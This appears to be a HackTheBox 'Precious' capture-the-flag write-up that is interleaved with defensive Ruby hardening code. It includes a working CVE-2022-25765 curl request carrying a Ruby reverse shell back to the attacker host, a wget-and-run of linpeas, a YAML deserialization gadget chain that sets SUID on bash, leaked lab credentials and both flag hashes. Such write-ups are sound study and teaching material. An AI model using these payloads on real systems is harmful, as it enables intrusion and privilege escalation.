Precious

Last updated 2 years ago

TARGET IP: 10.10.11.189

HOST IP: 10.10.16.10

Recon

NMAP

nmap [Target IP]
nmap -A -p 22,80 [Target IP]

HTTP

  • Start by mapping the hostname to the target IP address in the hosts file.

echo "[TARGET IP] precious.htb" | sudo tee -a /etc/hosts
  • I tried submitting a URL to see what happens, but it looks like the box does not have web access to view the page.

  • It does look like it will return credentials back depending on what you put in.

Enumeration

Gobuster

gobuster dir -u http://precious.htb/ -w /usr/share/dirb/wordlists/common.txt

Exploit

  • It looks like none of my notes from last night got saved for some stupid fucking reason. I need to learn how to better use this fucking site or this is going to drive me fucking nuts.

  • Long story but I created different file extension payloads. It seems like the machine filters out .php and .rb file extensions and will make a pdf file of any other file type I load into it.

  • I did this by starting up a python web server on my host machine and plugging the URL into the input box on the web server and opening up a netcat listener to see if I could get something to stick.

  • I'm still not positive on the backend code being used but am making the assumption that it is either php or ruby.

JAVA

  • I started trying out java reverse shells and got something interesting when I used a java one liner with the file extension .xml.

PDF

  • I finally downloaded one of the pdfs that I created and opened it in exiftool to take a look at the properties.

exiftool [PDF File Path]
  • It looks like the Creator field is pdfkit v0.8.6.

  • Let's go take a look at how I can possibly exploit this.

CVE-2022-25765

  • Looks like this tool has a vulnerability that allows for Command Injection. Let's see if we can exploit this.

  • Set up a netcat listener

nc -lvnp 4444
curl '[TARGET URL]' -X POST -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' -H 'Accept-Encoding: gzip, deflate' -H 'Content-Type: application/x-www-form-urlencoded' -H 'Origin: [TARGET URL]' -H 'Connection: keep-alive' -H 'Referer: [TARGET URL]' -H 'Upgrade-Insecure-Requests: 1' --data-raw 'url=http%3A%2F%2F[HOST IP]%3A[HOST PORT]%2F%3Fname%3D%2520%60+ruby+-rsocket+-e%27spawn%28%22sh%22%2C%5B%3Ain%2C%3Aout%2C%3Aerr%5D%3D%3ETCPSocket.new%28%22[HOST IP]%22%2C[HOST PORT]%29%29%27%60'
  • The data being sent is a URL-encoded Ruby reverse shell that connects back to the netcat listener I have set up.
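The injection works because the user-supplied URL ends up inside a shell command line, so a backtick in the URL becomes a second command. As an added, defender-side example that is not part of this writeup or of PDFKit, the functions below show the two mitigations that close that class of bug: validate the URL before use, and hand the converter its arguments as an argv array so no shell ever parses them. The converter binary name wkhtmltopdf and the wrapper functions are assumptions for illustration; the sample URLs are constructed.

```ruby
require "uri"
require "shellwords"

# Constructed sample inputs (not captured from the target machine).
GOOD_URL = "http://example.com/report?id=42"
BAD_URL  = "http://example.com/?name=%20`true`"   # shell metacharacter smuggled into a URL

# Characters a POSIX shell would interpret; a legitimate URL has no use for them.
SHELL_META = /[`$;|&<>"'\\\s()]/

# Accept only absolute http(s) URLs with a host and no shell metacharacters.
def safe_url?(input)
  return false if input.nil? || input.match?(SHELL_META)
  uri = URI.parse(input)
  %w[http https].include?(uri.scheme) && !uri.host.nil? && !uri.host.empty?
rescue URI::InvalidURIError
  false
end

# Build the converter invocation as an argv array. Given an array, Ruby's
# system / Process.spawn execute the program directly (no /bin/sh), so the
# URL is always exactly one argument and can never become a second command.
# The "wkhtmltopdf" binary name is an assumption for illustration.
def render_argv(url, output_path)
  raise ArgumentError, "refusing to render #{url.inspect}" unless safe_url?(url)
  ["wkhtmltopdf", "--quiet", url, output_path]
end

# Fallback for code that must build a single shell string: escape each
# argument individually instead of interpolating raw input.
def render_shell_line(url, output_path)
  render_argv(url, output_path).map { |a| Shellwords.escape(a) }.join(" ")
end
```

The argv form is the one to prefer: escaping is only as good as the escaper, whereas an argument vector never reaches a shell at all. The validator also rejects schemes such as file:// or gopher://, which a PDF renderer has no reason to fetch.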

  • Let's get a more interactive shell to work with.

python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
^Z
  • On the host machine, put the terminal into raw mode with echo off and bring the shell back to the foreground.

stty raw -echo; fg
  • Let's go look for the user flag.

find / -name user.txt 2>/dev/null
  • Looks like the file is unreadable due to permissions. Let's see what we can do about that.

  • I now know we have at least 3 users on the system:

    • henry

    • ruby

    • root

  • We can confirm this in the /etc/passwd file.

  • I tried sudo -l but needed a password to use it. I also spent some time digging around to try to find some other useful information. In the end, I went ahead and uploaded linpeas and ran it to see what was available.

  • I used the same python web server I already had running.

wget http://[HOST IP]:8000/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh
  • I wasn't getting anywhere there, so I started browsing around a bit more. In /home/ruby/.bundle/config I found some juicy info.

  • Looks like possible credentials for henry.

henry:Q3c1AqGHtoI0aXAYFH
  • I'll now SSH into the machine with henry's credentials and it works.

ssh henry@[Target IP]
  • Now let's get that user file.

0d534cd692f6860abfeb9af4ba3c4e92
  • The next step is to see what privileges I have as henry.

sudo -l
  • We have sudo privileges to run /opt/update_dependencies.rb with ruby. If we cat that file we can see that it reads a dependencies.yml file.

# Compare installed dependencies with those specified in "dependencies.yml"
require "yaml"
require 'rubygems'

# TODO: update versions automatically
def update_gems()
end

def list_from_file
    YAML.load(File.read("dependencies.yml"))
end

def list_local_gems
    Gem::Specification.sort_by{ |g| [g.name.downcase, g.version] }.map{|g| [g.name, g.version.to_s]}
end

gems_file = list_from_file
gems_local = list_local_gems

gems_file.each do |file_name, file_version|
    gems_local.each do |local_name, local_version|
        if(file_name == local_name)
            if(file_version != local_version)
                puts "Installed version differs from the one specified in file: " + local_name
            else
                puts "Installed version is equals to the one specified in file: " + local_name
            end
        end
    end
end
  • With this information, we should be able to craft a new dependencies.yml file containing a malicious object that the script will deserialize as root via sudo.

---
- !ruby/object:Gem::Installer
    i: x
- !ruby/object:Gem::SpecFetcher
    i: y
- !ruby/object:Gem::Requirement
  requirements:
    !ruby/object:Gem::Package::TarReader
    io: &1 !ruby/object:Net::BufferedIO
      io: &1 !ruby/object:Gem::Package::TarReader::Entry
         read: 0
         header: "abc"
      debug_output: &1 !ruby/object:Net::WriteAdapter
         socket: &1 !ruby/object:Gem::RequestSet
             sets: !ruby/object:Net::WriteAdapter
                 socket: !ruby/module 'Kernel'
                 method_id: :system
             git_set: "chmod +s /bin/bash"
         method_id: :resolve
  • You'll notice that git_set is set to chmod +s /bin/bash.

  • This sets the SUID bit on /bin/bash, which means we should be able to use it to escalate our privileges.

  • In the same directory that you created the dependencies.yml file, run the following:

sudo /usr/bin/ruby /opt/update_dependencies.rb
  • This will execute the file and end up changing the permissions of /bin/bash.

/bin/bash -p
  • Check who you are with whoami; you should now be root.

cat /root/root.txt
7090f28f7bc0ffc0a8b3203bd45ff6ac
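The root cause on the privilege-escalation side is the script's list_from_file: YAML.load on a file the low-privilege user controls, run as root through sudo, on a Ruby old enough that YAML.load performs full object deserialization (Psych 4, shipped with Ruby 3.1, made YAML.load behave like safe_load by default; this box is older). As an added example that is neither the writeup's nor the box's code, here is a hardened replacement built on YAML.safe_load, checked against three constructed files: a clean dependency list, a !ruby/object-tagged document shaped like the payload above, and one using an anchor/alias.

```ruby
require "yaml"

# Constructed sample files (not taken from the target machine).
BENIGN_YAML = <<~YAML
  rake: "13.0.6"
  bundler: "2.3.7"
YAML

# Same shape as the gadget-chain payload: a tag asking Psych to instantiate an
# arbitrary Ruby class. A dependency list never needs this.
TAGGED_YAML = <<~YAML
  ---
  - !ruby/object:Gem::Installer
    i: x
YAML

# An anchor/alias pair. Harmless here, but the gadget chains lean on aliases,
# and a flat name => version list has no use for them either.
ALIASED_YAML = <<~YAML
  rake: &v "13.0.6"
  other: *v
YAML

# Hardened replacement for the script's list_from_file. safe_load only builds
# Hash/Array/String/Numeric/Boolean/nil; any !ruby/object tag raises
# Psych::DisallowedClass before the class is ever instantiated, and
# aliases: false refuses anchor references outright.
def load_dependency_list(text)
  data = YAML.safe_load(text, permitted_classes: [], permitted_symbols: [], aliases: false)
  raise ArgumentError, "expected a mapping of gem name => version" unless data.is_a?(Hash)
  data.each do |name, version|
    unless name.is_a?(String) && version.is_a?(String)
      raise ArgumentError, "entry #{name.inspect} must map a string name to a quoted version string"
    end
  end
  data
end

# Returns :ok, or a symbol naming why the file was refused.
def check_dependency_file(text)
  load_dependency_list(text)
  :ok
rescue Psych::DisallowedClass
  :tagged_object
rescue Psych::BadAlias          # Psych 4 raises AliasesNotEnabled, a subclass
  :alias
rescue ArgumentError
  :bad_shape
end
```

Two further points the safe loader does not fix on its own. The script opens dependencies.yml relative to the current working directory, which is the only reason running it from /home/henry works; a sudo-exposed script should read a fixed, root-owned path. And the shape check insists on quoted version strings, because an unquoted 1.0 is loaded as a Float and would never compare equal to the string Gem::Version returns.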

I tried http://precious.htb/ and that still didn't work.

I found a tool on Github that uses a curl command and forms a reverse shell that exploits the vulnerability.

In the /home/henry directory we will create a new dependencies.yml file and use this code snippet I got online.

After this is done, we can use a privilege escalation technique from GTFOBins to escalate our privileges.